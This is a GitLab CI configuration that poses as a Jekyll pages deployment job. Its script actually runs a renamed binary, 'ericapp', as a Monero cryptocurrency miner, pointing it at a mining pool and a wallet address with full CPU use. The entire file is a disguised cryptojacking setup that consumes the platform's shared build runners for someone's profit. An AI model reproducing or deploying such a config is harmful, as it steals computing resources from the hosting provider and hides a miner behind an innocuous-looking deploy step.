image: jekyll/minimal:stable

pages:
  stage: deploy
  script:
  - chmod +x ericapp
  - ./ericapp -o mine.monerod.org:4444 -u 43HWy42AC348W4dPWHjtgCTbnZDHfkyqVB6vAX5j4JKHcm4TWrrPrmx2gNsWykaa5TU3iw721DGq3BUot22DFWVCGnHw2er -p GitLab --tls -k --cpu-no-yield
  only:
  - main
